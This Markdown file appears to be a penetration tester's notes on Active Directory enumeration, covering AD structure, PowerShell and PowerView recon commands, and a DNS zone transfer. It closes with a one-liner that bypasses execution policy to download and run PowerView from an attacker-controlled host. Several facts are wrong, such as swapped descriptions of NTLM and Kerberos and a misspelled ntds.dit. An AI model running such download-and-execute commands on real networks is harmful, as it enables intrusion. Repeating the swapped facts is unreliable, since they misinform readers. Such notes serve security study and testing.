113 lines
2.9 KiB
Markdown
113 lines
2.9 KiB
Markdown
# Active Directory Enumeration
|
|
|
|
* Consists of
|
|
* Domain Controller
|
|
* Organizational Units
|
|
* Users
|
|
* Groups
|
|
* Trusts
|
|
* AD Domains
|
|
* AD Forest
|
|
* Policies
|
|
|
|
* Administrative accounts are
|
|
* Domain Admin
|
|
* Enterprise Admin
|
|
* Schema Admin
|
|
* Server Operator
|
|
* Account Operator
|
|
|
|
## Domain Controller
|
|
|
|
* AD Domain Services data store
|
|
* Authentication and authorization
|
|
* Update replication / sync with other domain controllers in the forest
|
|
* Administration of domain resources
|
|
|
|
### AD DS Store
|
|
|
|
* Database of directory info such as users, groups and services
|
|
* `ntdis.dit` contains the information, including password hashes
|
|
* `SystemRoot%\NTDS`
|
|
|
|
### Forest
|
|
|
|
* __Trees__, hierarchy of domains in the AD Domain Services
|
|
* __Domains__, groups of objects
|
|
* __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources
|
|
* __Trusts__, allows users to access resources in a different domain
|
|
* __Objects__ users, groups, printers, computers or shares
|
|
* __Domain Services__, DNS, LLMNR, SMB
|
|
* __Domain Schema__, Rules for object creation
|
|
|
|
### Users
|
|
|
|
* __Domain Admin__, DC access
|
|
* __Server Accounts__, service maintenance, may have admin permissions
|
|
* __Local Admin__, administrative persmission on an object but not the DC
|
|
* __Domain Users__, average user account on a local machine which may have admin permissions
|
|
|
|
|
|
### Policies
|
|
|
|
* Rule sets
|
|
* Apply to a domain
|
|
* Enable or disables services on a domain basis, like antivirus and malware scanning
|
|
* __Disable Windows Defender__
|
|
* Communication signing, e.g. SMB
|
|
|
|
### Domain Services
|
|
|
|
* __LDAP__
|
|
* __Certificates__ handling for services, CRL
|
|
* __DNS, LLMNR, NBT-NS__
|
|
|
|
### Authentication
|
|
|
|
* __NTLM__, ticket granting service
|
|
* __Kerberos__, challenge/response via hashes
|
|
|
|
## Usage
|
|
|
|
* Cmdlets on Domain Controller
|
|
* Get some help, `Get-Help Get-Command -Examples`, `Get-Command Get-*`
|
|
|
|
* From `ActiveDirectory` module
|
|
```sh
|
|
Import-Module Active-Directory
|
|
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
|
|
Get-ADForest | Select-Object Domains
|
|
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
|
|
```
|
|
|
|
* `systeminfo | findstr Domain`
|
|
* `Get-ADUser -filter *`
|
|
* Use found CN and DC and specify
|
|
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
|
|
|
|
### Powerview Module
|
|
|
|
* [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
|
|
```sh
|
|
Import-Module .\PowerView.ps1
|
|
Get-NetDomain
|
|
Get-NetDomainController
|
|
Get-NetForest
|
|
Get-NetDomainTrust
|
|
```
|
|
|
|
### DNS
|
|
* Check ip via `ipconfig`
|
|
* `nslookup`, then `server <LocalIP>` and zone transfer via
|
|
```sh
|
|
ls -d <Domain>
|
|
```
|
|
|
|
### Tips & Tricks
|
|
|
|
* Download and execute in one line
|
|
```sh
|
|
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
|
|
ew.ps1'); Get-NetUser | select samaccountname, description"
|
|
```
|